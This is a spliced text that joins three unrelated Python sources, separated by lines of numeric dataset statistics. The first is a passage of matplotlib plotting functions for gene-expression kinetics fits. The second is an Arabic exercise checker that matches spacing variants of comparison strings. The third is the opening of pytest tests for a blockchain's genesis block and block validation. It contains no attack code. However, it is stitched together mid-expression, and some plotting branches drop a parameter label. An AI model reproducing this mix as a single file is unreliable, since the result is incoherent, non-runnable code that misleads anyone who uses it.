+ ": {0:.2f}; ".format(true_beta[i])
+ r"$\hat \beta$"
+ ": {0:.2f} \n".format(beta[i])
+ r"$\gamma$"
+ ": {0:.2f}; ".format(true_gamma[i])
+ r"$\hat \gamma$"
+ ": {0:.2f} \n".format(gamma[i]),
ha="left",
va="top",
transform=ax.transAxes,
)
else:
ax.text(
0.01 + padding,
0.99,
r"$\alpha$"
+ ": {0:.2f}; ".format(true_alpha[i])
+ r"$\hat \alpha$"
+ ": {0:.2f} \n".format(alpha[i])
+ r"$\gamma$"
+ ": {0:.2f}; ".format(true_gamma[i])
+ r"$\hat \gamma$"
+ ": {0:.2f} \n".format(gamma[i]),
ha="left",
va="top",
transform=ax.transAxes,
)
else:
if has_splicing:
ax.text(
0.01 + padding,
0.99,
r"$\hat \alpha$"
+ ": {0:.2f} \n".format(alpha[i])
+ r"$\hat \beta$"
+ ": {0:.2f} \n".format(beta[i])
+ r"$\hat \gamma$"
+ ": {0:.2f} \n".format(gamma[i]),
ha="left",
va="top",
transform=ax.transAxes,
)
else:
ax.text(
0.01 + padding,
0.99,
r"$\hat \alpha$"
+ ": {0:.2f} \n".format(alpha[i])
+ r"$\hat \gamma$"
+ ": {0:.2f} \n".format(gamma[i]),
ha="left",
va="top",
transform=ax.transAxes,
)
max_box_plots = 4 if has_splicing else 2
max_line_plots = 2 if has_splicing else 1
# if show_variance first plot box plot
if show_variance:
if j < max_box_plots:
if has_splicing:
Obs = X_raw[i][j][0].A.flatten() if issparse(X_raw[i][j][0]) else X_raw[i][j][0].flatten()
else:
Obs = X_raw[i][j][0].A.flatten() if issparse(X_raw[i][j][0]) else X_raw[i][j][0].flatten()
ax.boxplot(
x=[Obs[T == std] for std in T_uniq],
positions=T_uniq,
widths=boxwidth,
showfliers=False,
showmeans=True,
)
ax.plot(T_uniq, cur_X_fit_data[j].T, "b")
ax.plot(T_uniq, cur_X_data[j], "k--")
ax.set_title(gene_name + " (" + title_[j] + ")")
# if not show_variance then first plot line plot
else:
if has_splicing:
if j == 0:
ax.plot(T_uniq, cur_X_fit_data[[0, 1]].T)
ax.plot(T_uniq, cur_X_data[[0, 1]].T, "k--")
ax.legend(title_[:2])
elif j == 1:
ax.plot(T_uniq, cur_X_fit_data[[2, 3]].T)
ax.plot(T_uniq, cur_X_data[[2, 3]].T, "k--")
ax.legend(title_[2:4])
ax.set_title(gene_name)
else:
if j == 0:
ax.plot(T_uniq, cur_X_fit_data[[0, 1]].T)
ax.plot(T_uniq, cur_X_data[[0, 1]].T, "k--")
ax.legend(title_[:2])
ax.set_title(gene_name)
# other subplots
if not ((show_variance and j < max_box_plots) or (not show_variance and j < max_line_plots)):
ax.plot(T_uniq, cur_X_fit_data[j].T)
ax.plot(T_uniq, cur_X_data[j], "k--")
if show_variance:
ax.legend([title_[j]])
else:
if has_splicing:
ax.legend([title_[j + 2]])
else:
ax.legend([title_[j + 1]])
ax.set_title(gene_name)
# properly set the xticks
ax.set_xticks(xticks)
ax.set_xticklabels(xticks_labels, rotation=30, ha="right")
if true_param_prefix is not None:
ax.plot(t, true_p[j], "r")
ax.set_xlabel("time (" + unit + ")")
if y_log_scale:
ax.set_yscale("log")
if log_unnormalized:
ax.set_ylabel("Expression (log)")
else:
ax.set_ylabel("Expression")
return gs
def plot_deg_det(
adata,
genes,
has_splicing,
use_smoothed,
log_unnormalized,
t,
T,
T_uniq,
unit,
X_data,
X_fit_data,
logLL,
true_p,
grp_len,
sub_plot_n,
ncols,
boxwidth,
gs,
fig_mat,
gene_order,
y_log_scale,
true_param_prefix,
true_params,
est_params,
show_variance,
show_kin_parameters,
):
import matplotlib.pyplot as plt
true_alpha, true_beta, true_gamma = true_params
alpha, beta, gamma = est_params
if len(T_uniq) > 6:
xticks, xticks_labels = (
np.round(np.linspace(0, max(T_uniq), 6), 2),
np.round(np.linspace(0, max(T_uniq), 6), 2),
)
else:
xticks, xticks_labels = T_uniq, T_uniq
if has_splicing:
if "M_ul" in adata.layers.keys() and use_smoothed:
title_ = ["M_ul", "M_sl"]
layers = ["M_ul", "M_sl", "M_uu", "M_su"]
layer_u, layer_s = "M_ul", "M_sl"
else:
title_ = ["X_ul", "X_sl"]
layers = ["X_ul", "X_sl", "X_uu", "X_su"]
layer_u, layer_s = "X_ul", "X_sl"
_, X_raw = prepare_data_has_splicing(
adata,
genes,
T,
layer_u=layer_u,
layer_s=layer_s,
total_layers=layers,
)
else:
if "M_t" in adata.layers.keys() and use_smoothed:
title_ = ["M_n"]
total_layer = "M_t"
layer = "M_n"
else:
title_ = ["X_new"]
total_layer = "X_total"
layer = "X_new"
_, X_raw = prepare_data_no_splicing(adata, adata.var.index, T, layer=layer, total_layer=total_layer)
for i, gene_name in enumerate(genes):
cur_X_data, cur_X_fit_data, cur_logLL = (
X_data[i],
X_fit_data[i],
logLL[i],
)
for j in range(sub_plot_n):
row_ind = int(np.floor(i / ncols)) # make sure unlabled and labeled are in the same column.
col_loc = (row_ind * sub_plot_n + j) * ncols * grp_len + (i % ncols - 1) * grp_len + 1
row_i, col_i = np.where(fig_mat == col_loc)
ax = plt.subplot(gs[col_loc]) if gene_order == "column" else plt.subplot(gs[fig_mat[col_i, row_i][0]])
if j == 0:
ax.text(
0.65,
0.80,
r"$logLL={0:.2f}$".format(cur_logLL)
+ " \n"
+ r"$t_{1/2} = $"
+ "{0:.2f}".format(np.log(2) / gamma[i])
+ unit[0],
ha="left",
va="top",
transform=ax.transAxes,
)
if show_kin_parameters:
if true_param_prefix is not None:
if has_splicing:
ax.text(
0.65,
0.99,
# r"$\alpha$"
# + ": {0:.2f}; ".format(true_alpha[i])
# + r"$\hat \alpha$"
# + ": {0:.2f} \n".format(alpha[i])
r"$\beta$"
+ ": {0:.2f}; ".format(true_beta[i])
+ r"$\hat \beta$"
+ ": {0:.2f} \n".format(beta[i])
+ r"$\gamma$"
+ ": {0:.2f}; ".format(true_gamma[i])
+ r"$\hat \gamma$"
+ ": {0:.2f} \n".format(gamma[i]),
ha="left",
va="top",
transform=ax.transAxes,
)
else:
ax.text(
0.65,
0.99,
# r"$\alpha$"
# + ": {0:.2f}; ".format(true_alpha[i])
# + r"$\hat \alpha$"
": {0:.2f} \n".format(alpha[i])
+ r"$\gamma$"
+ ": {0:.2f}; ".format(true_gamma[i])
+ r"$\hat \gamma$"
+ ": {0:.2f} \n".format(gamma[i]),
ha="left",
va="top",
transform=ax.transAxes,
)
else:
if has_splicing:
ax.text(
0.65,
0.99,
# r"$\hat \alpha$"
# + ": {0:.2f} \n".format(alpha[i])
r"$\hat \beta$"
+ ": {0:.2f} \n".format(beta[i])
+ r"$\hat \gamma$"
+ ": {0:.2f} \n".format(gamma[i]),
ha="left",
va="top",
transform=ax.transAxes,
)
else:
ax.text(
0.65,
0.99,
# r"$\hat \alpha$"
# + ": {0:.2f} \n".format(alpha[i])
r"$\hat \gamma$" + ": {0:.2f} \n".format(gamma[i]),
ha="left",
va="top",
transform=ax.transAxes,
)
if show_variance:
if has_splicing:
Obs = X_raw[i][j][0].A.flatten() if issparse(X_raw[i][j][0]) else X_raw[i][j][0].flatten()
else:
Obs = X_raw[i].A.flatten() if issparse(X_raw[i][0]) else X_raw[i].flatten()
ax.boxplot(
x=[Obs[T == std] for std in T_uniq],
positions=T_uniq,
widths=boxwidth,
showfliers=False,
showmeans=True,
)
if has_splicing:
ax.plot(T_uniq, cur_X_fit_data[j], "b")
ax.plot(T_uniq, cur_X_data[j], "k--")
else:
ax.plot(T_uniq, cur_X_fit_data.flatten(), "b")
ax.plot(T_uniq, cur_X_data.flatten(), "k--")
ax.set_title(gene_name + " (" + title_[j] + ")")
else:
ax.plot(T_uniq, cur_X_fit_data.T)
ax.legend(title_)
ax.plot(T_uniq, cur_X_data.T, "k--")
ax.set_title(gene_name)
# properly set the xticks
ax.set_xticks(xticks)
ax.set_xticklabels(xticks_labels, rotation=30, ha="right")
if true_param_prefix is not None:
if has_splicing:
ax.plot(t, true_p[j], "r")
else:
ax.plot(t, true_p[j], "r")
ax.set_xlabel("time (" + unit + ")")
if y_log_scale:
ax.set_yscale("log")
if log_unnormalized:
ax.set_ylabel("Expression (log)")
else:
ax.set_ylabel("Expression")
return gs
def plot_deg_sto(
adata,
genes,
has_splicing,
use_smoothed,
log_unnormalized,
t,
T,
T_uniq,
unit,
X_data,
X_fit_data,
logLL,
true_p,
grp_len,
sub_plot_n,
ncols,
boxwidth,
gs,
fig_mat,
gene_order,
y_log_scale,
true_param_prefix,
true_params,
est_params,
show_moms_fit,
show_variance,
show_kin_parameters,
):
import matplotlib.pyplot as plt
true_alpha, true_beta, true_gamma = true_params
alpha, beta, gamma = est_params
if len(T_uniq) > 6:
xticks, xticks_labels = (
np.round(np.linspace(0, max(T_uniq), 6), 2),
np.round(np.linspace(0, max(T_uniq), 6), 2),
)
else:
xticks, xticks_labels = T_uniq, T_uniq
if has_splicing:
if "M_ul" in adata.layers.keys() and use_smoothed:
title_ = ["M_ul", "M_sl", "M_ul2", "M_sl2", "M_ul_sl"] if show_moms_fit else ["M_ul", "M_sl"]
layers = ["M_ul", "M_sl", "M_uu", "M_su"]
layer_u, layer_s = "M_ul", "M_sl"
else:
title_ = ["X_ul", "X_sl", "X_ul2", "X_sl2", "X_ul_sl"] if show_moms_fit else ["X_ul", "X_sl"]
layers = ["X_ul", "X_sl", "X_uu", "X_su"]
layer_u, layer_s = "X_ul", "X_sl"
_, X_raw = prepare_data_has_splicing(
adata,
genes,
T,
layer_u=layer_u,
layer_s=layer_s,
total_layers=layers,
)
else:
if "M_t" in adata.layers.keys() and use_smoothed:
title_ = ["M_n", "M_n2"] if show_moms_fit else ["M_n"]
total_layer = "M_t"
layer = "M_n"
else:
title_ = ["X_new", "X_n2"] if show_moms_fit else ["X_new"]
total_layer = "X_total"
layer = "X_new"
_, X_raw = prepare_data_no_splicing(adata, adata.var.index, T, layer=layer, total_layer=total_layer)
for i, gene_name in enumerate(genes):
cur_X_data, cur_X_fit_data, cur_logLL = (
X_data[i],
X_fit_data[i],
logLL[i],
)
for j in range(sub_plot_n):
row_ind = int(np.floor(i / ncols)) # make sure unlabled and labeled are in the same column.
col_loc = (row_ind * sub_plot_n + j) * ncols * grp_len + (i % ncols - 1) * grp_len + 1
row_i, col_i = np.where(fig_mat == col_loc)
ax = plt.subplot(gs[col_loc]) if gene_order == "column" else plt.subplot(gs[fig_mat[col_i, row_i][0]])
if j == 0:
ax.text(
0.65,
0.80,
r"$logLL={0:.2f}$".format(cur_logLL)
+ " \n"
+ r"$t_{1/2} = $"
+ "{0:.2f}".format(np.log(2) / gamma[i])
+ unit[0],
ha="left",
va="top",
transform=ax.transAxes,
)
if show_kin_parameters:
if true_param_prefix is not None:
if has_splicing:
ax.text(
0.65,
0.99,
# r"$\alpha$"
# + ": {0:.2f}; ".format(true_alpha[i])
# + r"$\hat \alpha$"
# + ": {0:.2f} \n".format(alpha[i])
r"$\beta$"
+ ": {0:.2f}; ".format(true_beta[i])
+ r"$\hat \beta$"
+ ": {0:.2f} \n".format(beta[i])
+ r"$\gamma$"
+ ": {0:.2f}; ".format(true_gamma[i])
+ r"$\hat \gamma$"
+ ": {0:.2f} \n".format(gamma[i]),
ha="left",
va="top",
transform=ax.transAxes,
)
else:
ax.text(
0.65,
0.99,
# r"$\alpha$"
# + ": {0:.2f}; ".format(true_alpha[i])
# + r"$\hat \alpha$"
": {0:.2f} \n".format(alpha[i])
+ r"$\gamma$"
+ ": {0:.2f}; ".format(true_gamma[i])
+ r"$\hat \gamma$"
+ ": {0:.2f} \n".format(gamma[i]),
ha="left",
va="top",
transform=ax.transAxes,
)
else:
if has_splicing:
ax.text(
0.65,
0.99,
# r"$\hat \alpha$"
# + ": {0:.2f} \n".format(alpha[i])
r"$\hat \beta$"
+ ": {0:.2f} \n".format(beta[i])
+ r"$\hat \gamma$"
+ ": {0:.2f} \n".format(gamma[i]),
ha="left",
va="top",
transform=ax.transAxes,
)
else:
ax.text(
0.65,
0.99,
# r"$\hat \alpha$"
# + ": {0:.2f} \n".format(alpha[i])
r"$\hat \gamma$" + ": {0:.2f} \n".format(gamma[i]),
ha="left",
va="top",
transform=ax.transAxes,
)
max_box_plots = 2 if has_splicing else 1
# if show_variance first plot box plot
if show_variance:
if j < max_box_plots:
if has_splicing:
Obs = X_raw[i][j][0].A.flatten() if issparse(X_raw[i][j][0]) else X_raw[i][j][0].flatten()
else:
Obs = X_raw[i].A.flatten() if issparse(X_raw[i][0]) else X_raw[i].flatten()
ax.boxplot(
x=[Obs[T == std] for std in T_uniq],
positions=T_uniq,
widths=boxwidth,
showfliers=False,
showmeans=True,
)
ax.plot(T_uniq, cur_X_fit_data[j].T, "b")
ax.plot(T_uniq, cur_X_data[j], "k--")
ax.set_title(gene_name + " (" + title_[j] + ")")
# if not show_variance then first plot line plot
else:
if j == 0:
if has_splicing:
ax.plot(T_uniq, cur_X_fit_data[[0, 1]].T)
ax.legend(title_[:2])
ax.plot(T_uniq, cur_X_data[[0, 1]].T, "k--")
else:
ax.plot(T_uniq, cur_X_fit_data[j].T)
ax.legend(labels=[title_[j]])
ax.plot(T_uniq, cur_X_data[j].T, "k--")
ax.set_title(gene_name)
# other subplots
if not ((show_variance and j < max_box_plots) or (not show_variance and j == 0)):
ax.plot(T_uniq, cur_X_fit_data[j].T)
ax.plot(T_uniq, cur_X_data[j], "k--")
if show_variance:
ax.legend([title_[j]])
else:
if has_splicing:
ax.legend([title_[j + 1]])
else:
ax.legend([title_[j]])
ax.set_title(gene_name)
# properly set the xticks
ax.set_xticks(xticks)
ax.set_xticklabels(xticks_labels, rotation=30, ha="right")
if true_param_prefix is not None:
ax.plot(t, true_p[j], "r")
ax.set_xlabel("time (" + unit + ")")
if y_log_scale:
ax.set_yscale("log")
if log_unnormalized:
ax.set_ylabel("Expression (log)")
else:
ax.set_ylabel("Expression")
return gs
def plot_kin_twostep(
adata,
genes,
has_splicing,
use_smoothed,
t,
T,
T_uniq,
unit,
X_data,
X_fit_data,
logLL,
grp_len,
sub_plot_n,
ncols,
gs,
fig_mat,
gene_order,
true_param_prefix,
true_params,
est_params,
show_kin_parameters,
):
import matplotlib.pyplot as plt
true_alpha, true_beta, true_gamma = true_params
alpha, beta, gamma = est_params
mapper = get_mapper()
if len(T_uniq) > 6:
xticks, xticks_labels = (
np.round(np.linspace(0, max(T_uniq), 6), 2),
np.round(np.linspace(0, max(T_uniq), 6), 2),
)
else:
xticks, xticks_labels = T_uniq, T_uniq
unique_labels = np.unique(T_uniq)
color_key = _to_hex(plt.get_cmap("viridis")(np.linspace(0, 1, len(unique_labels))))
new_color_key = {k: color_key[i] for i, k in enumerate(unique_labels)}
colors = pd.Series(T).map(new_color_key).values
r2 = adata[:, genes].var["gamma_r2"]
mean_R2 = adata[:, genes].var["mean_R2"]
for i, gene_name in enumerate(genes):
cur_X_data, cur_X_fit_data, cur_logLL = (
X_data[i],
X_fit_data[i],
logLL[i],
)
r = adata[:, gene_name].layers[mapper["X_total"]] if use_smoothed else adata[:, gene_name].layers["X_total"]
n = adata[:, gene_name].layers[mapper["X_new"]] if use_smoothed else adata[:, gene_name].layers["X_new"]
r = r.A.flatten() if issparse(r) else r.flatten()
n = n.A.flatten() if issparse(n) else n.flatten()
for j in range(sub_plot_n):
row_ind = int(np.floor(i / ncols)) # make sure unlabled and labeled are in the same column.
col_loc = (row_ind * sub_plot_n + j) * ncols * grp_len + (i % ncols - 1) * grp_len + 1
row_i, col_i = np.where(fig_mat == col_loc)
ax = plt.subplot(gs[col_loc]) if gene_order == "column" else plt.subplot(gs[fig_mat[col_i, row_i][0]])
if j == 0:
if cur_logLL is not None:
ax.text(
0.05,
0.99,
r"$logLL={0:.2f}$".format(cur_logLL)
+ " \n"
+ r"$t_{1/2} = $"
+ "{0:.2f}".format(np.log(2) / gamma[i])
+ unit[0],
ha="left",
va="top",
transform=ax.transAxes,
)
ax.scatter(r, n, c=colors, alpha=0.25, ec=None)
legend_elements = [
# Patch(facecolor=color_key[i], label=k)
Line2D(
[0],
[0],
marker="o",
color=color_key[ind],
label=k,
linestyle="None",
)
for ind, k in enumerate(T_uniq)
]
ax.legend(
handles=legend_elements,
bbox_to_anchor=(0.9, 1),
loc="upper left",
ncol=len(T_uniq) // 15 + 1,
)
xnew = np.linspace(np.min(r), np.max(r) * 0.80)
for ind in range(len(cur_X_data)):
ax.plot(
xnew,
xnew * cur_X_data[ind],
dashes=[6, 2],
lw=4,
c=new_color_key[T_uniq[ind]],
)
if use_smoothed:
ax.set_xlabel("total (1st moment)")
ax.set_ylabel("new (1st moment)")
else:
ax.set_xlabel("total (size factor normalized only)")
ax.set_ylabel("new (size factor normalized only)")
ax.set_title(gene_name)
ax.text(
0.05,
0.6,
"<r2> = %.4f" % (mean_R2[i]),
ha="left",
va="center",
transform=ax.transAxes,
)
elif j == 1:
# y-axis should be -np.log(1 - cur_X_data)
ax.scatter(T_uniq, -np.log(1 - cur_X_data), c=color_key)
ax.scatter(T_uniq, cur_X_fit_data, c="r")
ax.plot(
T_uniq,
cur_X_fit_data,
dashes=[6, 2],
c="k",
)
ax.set_xlabel("Time (" + unit + ")")
ax.set_ylabel("-log(1-k)")
ax.text(
0.05,
0.6,
"r2 = %.4f" % (r2[i]),
ha="left",
va="center",
transform=ax.transAxes,
)
if show_kin_parameters:
if true_param_prefix is not None:
if has_splicing:
ax.text(
0.05,
0.99,
r"$\alpha$"
+ ": {0:.2f}; ".format(true_alpha[i])
+ r"$\hat \alpha$"
+ ": {0:.2f} \n".format(alpha[i])
+ r"$\beta$"
+ ": {0:.2f}; ".format(true_beta[i])
+ r"$\hat \beta$"
+ ": {0:.2f} \n".format(beta[i])
+ r"$\gamma$"
+ ": {0:.2f}; ".format(true_gamma[i])
+ r"$\hat \gamma$"
+ ": {0:.2f} \n".format(gamma[i]),
ha="left",
va="top",
transform=ax.transAxes,
)
else:
ax.text(
0.05,
0.99,
r"$\alpha$"
+ ": {0:.2f}; ".format(true_alpha[i])
+ r"$\hat \alpha$"
+ ": {0:.2f} \n".format(alpha[i])
+ r"$\gamma$"
+ ": {0:.2f}; ".format(true_gamma[i])
+ r"$\hat \gamma$"
+ ": {0:.2f} \n".format(gamma[i]),
ha="left",
va="top",
transform=ax.transAxes,
)
else:
if has_splicing:
ax.text(
0.05,
0.99,
r"$\hat \alpha$"
+ ": {0:.2f} \n".format(alpha[i])
+ r"$\hat \beta$"
+ ": {0:.2f} \n".format(beta[i])
+ r"$\hat \gamma$"
+ ": {0:.2f} \n".format(gamma[i]),
ha="left",
va="top",
transform=ax.transAxes,
)
else:
ax.text(
0.05,
0.99,
r"$\hat \alpha$"
+ ": {0:.2f} \n".format(alpha[i])
+ r"$\hat \gamma$"
+ ": {0:.2f} \n".format(gamma[i]),
ha="left",
va="top",
transform=ax.transAxes,
)
# properly set the xticks
ax.set_xticks(xticks)
ax.set_xticklabels(xticks_labels, rotation=30, ha="right")
return gs
def plot_kin_deg_twostep(
adata,
genes,
has_splicing,
use_smoothed,
log_unnormalized,
T,
T_uniq,
unit,
X_data,
X_fit_data,
logLL,
grp_len,
sub_plot_n,
ncols,
boxwidth,
gs,
fig_mat,
gene_order,
y_log_scale,
true_param_prefix,
true_params,
est_params,
show_variance,
show_kin_parameters,
):
import matplotlib.pyplot as plt
true_alpha, true_beta, true_gamma = true_params
alpha, beta, gamma = est_params
if len(T_uniq) > 6:
xticks, xticks_labels = (
np.round(np.linspace(0, max(T_uniq), 6), 2),
np.round(np.linspace(0, max(T_uniq), 6), 2),
)
else:
xticks, xticks_labels = T_uniq, T_uniq
layer = "M_n" if ("M_n" in adata.layers.keys() and use_smoothed) else "X_new"
total_layer = "M_t" if ("M_t" in adata.layers.keys() and use_smoothed) else "X_total"
_, X_raw = prepare_data_no_splicing(adata, adata.var.index, T, layer=layer, total_layer=total_layer)
for i, gene_name in enumerate(genes):
cur_X_data, cur_logLL = X_data[i], logLL[i]
cur_X_fit_data, cur_tt, cur_h = (
X_fit_data[i][0],
X_fit_data[i][1][0],
X_fit_data[i][1][1],
)
Obs = X_raw[i].A.flatten() if issparse(X_raw[i][0]) else X_raw[i].flatten()
for j in range(sub_plot_n):
row_ind = int(np.floor(i / ncols)) # make sure unlabled and labeled are in the same column.
col_loc = (row_ind * sub_plot_n + j) * ncols * grp_len + (i % ncols - 1) * grp_len + 1
row_i, col_i = np.where(fig_mat == col_loc)
ax = plt.subplot(gs[col_loc]) if gene_order == "column" else plt.subplot(gs[fig_mat[col_i, row_i][0]])
if j == 0:
ax.text(
0.9,
0.99,
r"$logLL={0:.2f}$".format(cur_logLL)
+ " \n"
+ r"$t_{1/2} = $"
+ "{0:.2f}".format(np.log(2) / gamma[i])
+ unit[0],
ha="left",
va="top",
transform=ax.transAxes,
)
if show_variance:
ax.boxplot(
x=[Obs[T == std] for std in T_uniq],
positions=T_uniq,
widths=boxwidth,
showfliers=False,
showmeans=True,
)
ax.plot(T_uniq, cur_X_fit_data, "b") # ax.plot(T_uniq, cur_X_fit_data[j].T, "b")
ax.plot(T_uniq, cur_X_data, "k--") # ax.plot(T_uniq, cur_X_data[j], "k--")
ax.set_ylabel("labeled")
ax.set_title(gene_name + str(cur_logLL))
else:
ax.plot(T_uniq, cur_X_fit_data.T, "b")
ax.plot(T_uniq, cur_X_data, "k--")
ax.set_ylabel("labeled")
ax.set_title(gene_name + str(cur_logLL))
elif j == 1:
ax.plot(cur_tt, cur_h, "b")
ax.plot(cur_tt, cur_h, "r*")
ax.set_ylabel("labeled")
ax.legend(["model (deterministic)", "model (kinetic chase)"])
ax.set_title("unseen initial conc.")
# properly set the xticks
ax.set_xticks(xticks)
ax.set_xticklabels(xticks_labels, rotation=30, ha="right")
if show_kin_parameters:
if true_param_prefix is not None:
if has_splicing:
ax.text(
0.80,
0.6,
r"$\alpha$"
+ ": {0:.2f}; ".format(true_alpha[i])
+ r"$\hat \alpha$"
+ ": {0:.2f} \n".format(alpha[i])
+ r"$\beta$"
+ ": {0:.2f}; ".format(true_beta[i])
+ r"$\hat \beta$"
+ ": {0:.2f} \n".format(beta[i])
+ r"$\gamma$"
+ ": {0:.2f}; ".format(true_gamma[i])
+ r"$\hat \gamma$"
+ ": {0:.2f} \n".format(gamma[i]),
ha="left",
va="top",
transform=ax.transAxes,
)
else:
ax.text(
0.80,
0.6,
r"$\alpha$"
+ ": {0:.2f}; ".format(true_alpha[i])
+ r"$\hat \alpha$"
+ ": {0:.2f} \n".format(alpha[i])
+ r"$\gamma$"
+ ": {0:.2f}; ".format(true_gamma[i])
+ r"$\hat \gamma$"
+ ": {0:.2f} \n".format(gamma[i]),
ha="left",
va="top",
transform=ax.transAxes,
)
if use_smoothed:
ax.set_ylabel("labeled (1st moment)")
else:
ax.set_ylabel("labeled (size factor normalized only)")
ax.set_xlabel("time (" + unit + ")")
if y_log_scale:
ax.set_yscale("log")
if log_unnormalized:
ax.set_ylabel("Expression (log)")
else:
ax.set_ylabel("Expression")
return gs
| 37.665176 | 116 | 0.37138 | 8,063 | 75,820 | 3.253008 | 0.031006 | 0.016928 | 0.012963 | 0.032407 | 0.951352 | 0.938808 | 0.92859 | 0.924854 | 0.921118 | 0.911701 | 0 | 0.026251 | 0.506621 | 75,820 | 2,012 | 117 | 37.683897 | 0.674909 | 0.025231 | 0 | 0.881679 | 0 | 0 | 0.072041 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.004907 | false | 0 | 0.008724 | 0 | 0.018539 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
7ca15907e22324a79c12cb519eacced0bb895698 | 1,845 | py | Python | exercises/test_E2.py | dataXcode/IPP | c9b94ad2d7dc14b01e6657a4fa555507bbc7e93b | [
"MIT"
] | null | null | null | exercises/test_E2.py | dataXcode/IPP | c9b94ad2d7dc14b01e6657a4fa555507bbc7e93b | [
"MIT"
] | null | null | null | exercises/test_E2.py | dataXcode/IPP | c9b94ad2d7dc14b01e6657a4fa555507bbc7e93b | [
"MIT"
] | null | null | null | def test():
# Test
assert("my_room > 12 and my_room < 25" in __solution__ or "my_room> 12 and my_room < 25" in __solution__ or "my_room >12 and my_room < 25" in __solution__ or "my_room>12 and my_room < 25" in __solution__
or "my_room > 12 and my_room< 25" in __solution__ or "my_room > 12 and my_room< 25" in __solution__ or "my_room > 12 and my_room <25" in __solution__ or "my_room>12 and my_room<25" in __solution__
or "my_room> 12 and my_room< 25" in __solution__ or "my_room> 12 and my_room< 25" in __solution__ or "my_room> 12 and my_room <25" in __solution__ or "my_room> 12 and my_room<25" in __solution__
or "my_room >12 and my_room< 25" in __solution__ or "my_room >12 and my_room< 25" in __solution__ or "my_room > 12 and my_room <25" in __solution__ or "my_room > 12 and my_room<25" in __solution__
), "اجابة خاطئة: في النقطة الاولى لم تقم بعملية المقارنة بشكل صحيح"
assert("my_room * 2 > your_room * 3" in __solution__ or "my_room* 2 > your_room * 3" in __solution__ or "my_room *2 > your_room * 3" in __solution__ or "my_room*2 > your_room * 3" in __solution__
or "my_room * 2 > your_room* 3" in __solution__ or "my_room * 2 > your_room *3" in __solution__ or "my_room * 2 > your_room*3" in __solution__ or "my_room*2 > your_room*3" in __solution__
or "my_room* 2 > your_room* 3" in __solution__ or "my_room* 2 > your_room *3" in __solution__ or "my_room* 2 > your_room*3" in __solution__ or "my_room* 2 > your_room*3" in __solution__
or "my_room *2 > your_room* 3" in __solution__ or "my_room *2 > your_room *3" in __solution__ or "my_room *2 > your_room*3" in __solution__ or "my_room *2 > your_room*3" in __solution__
), "اجابة خاطئة: في النقطة الثانية لم تقم بعملية المقارنة بشكل صحيح"
__msg__.good("اجابة صحيحة. احسنت")
| 123 | 207 | 0.695935 | 334 | 1,845 | 3.257485 | 0.08982 | 0.264706 | 0.330882 | 0.386029 | 0.946691 | 0.946691 | 0.863971 | 0.863971 | 0.863971 | 0.863971 | 0 | 0.066207 | 0.214092 | 1,845 | 14 | 208 | 131.785714 | 0.684138 | 0.002168 | 0 | 0.5 | 0 | 0 | 0.532898 | 0 | 0 | 0 | 0 | 0 | 0.166667 | 1 | 0.083333 | true | 0 | 0 | 0 | 0.083333 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 11 |
7caf072409a63294317f4c81ebcacf310834f41a | 29,859 | py | Python | tests/full_node/test_blockchain.py | altendky/chia-blockchain | f745601d810a27e7c3887216199a6637a0261573 | [
"Apache-2.0"
] | 2 | 2019-12-06T01:03:24.000Z | 2020-09-27T00:46:20.000Z | tests/full_node/test_blockchain.py | altendky/chia-blockchain | f745601d810a27e7c3887216199a6637a0261573 | [
"Apache-2.0"
] | 1 | 2020-11-01T15:24:50.000Z | 2020-11-01T15:24:50.000Z | tests/full_node/test_blockchain.py | altendky/chia-blockchain | f745601d810a27e7c3887216199a6637a0261573 | [
"Apache-2.0"
] | null | null | null | import asyncio
import time
from pathlib import Path
from secrets import token_bytes
import aiosqlite
import pytest
from blspy import AugSchemeMPL
from src.full_node.blockchain import Blockchain, ReceiveBlockResult
from src.types.full_block import FullBlock
from src.types.header import Header, HeaderData
from src.types.proof_of_space import ProofOfSpace
from src.util.ints import uint8, uint64, uint32
from src.util.errors import Err
from src.types.sized_bytes import bytes32
from src.types.pool_target import PoolTarget
from src.full_node.block_store import BlockStore
from src.full_node.coin_store import CoinStore
from src.consensus.find_fork_point import find_fork_point_in_chain
from src.util.make_test_constants import make_test_constants_with_genesis
# Build test constants (and the matching block tool ``bt``) with a tiny
# difficulty/discriminant so blocks can be generated quickly in tests.
test_constants, bt = make_test_constants_with_genesis(
    {
        "DIFFICULTY_STARTING": 1,
        "DISCRIMINANT_SIZE_BITS": 8,
        "BLOCK_TIME_TARGET": 10,
        "DIFFICULTY_EPOCH": 6,  # The number of blocks per epoch
        "DIFFICULTY_WARP_FACTOR": 3,
        "DIFFICULTY_DELAY": 2,  # EPOCH / WARP_FACTOR
        "MIN_ITERS_STARTING": 50 * 1,
        "NUMBER_ZERO_BITS_CHALLENGE_SIG": 1,
    }
)
@pytest.fixture(scope="module")
def event_loop():
    """Yield the default asyncio event loop, shared by all tests in this module."""
    yield asyncio.get_event_loop()
class TestGenesisBlock:
    @pytest.mark.asyncio
    async def test_basic_blockchain(self):
        """A freshly created blockchain should hold exactly the genesis block."""
        # Start from a clean database file.
        db_path = Path("blockchain_test.db")
        if db_path.exists():
            db_path.unlink()
        connection = await aiosqlite.connect(db_path)
        coin_store = await CoinStore.create(connection)
        block_store = await BlockStore.create(connection)
        chain = await Blockchain.create(coin_store, block_store, test_constants)
        assert len(chain.get_current_tips()) == 1
        genesis_block = chain.get_current_tips()[0]
        assert genesis_block.height == 0
        # At genesis the next difficulty equals the genesis weight.
        assert chain.get_next_difficulty(genesis_block) == genesis_block.weight
        assert chain.get_next_min_iters(chain.genesis) > 0
        await connection.close()
        chain.shut_down()
class TestBlockValidation:
    """Each test corrupts one aspect of an otherwise-valid block (blocks[9])
    and checks that ``receive_block`` rejects it with the expected error."""

    @pytest.fixture(scope="module")
    async def initial_blockchain(self):
        """
        Provides a list of 10 valid blocks, as well as a blockchain with 9 blocks added to it.
        """
        blocks = bt.get_consecutive_blocks(test_constants, 10, [], 10)
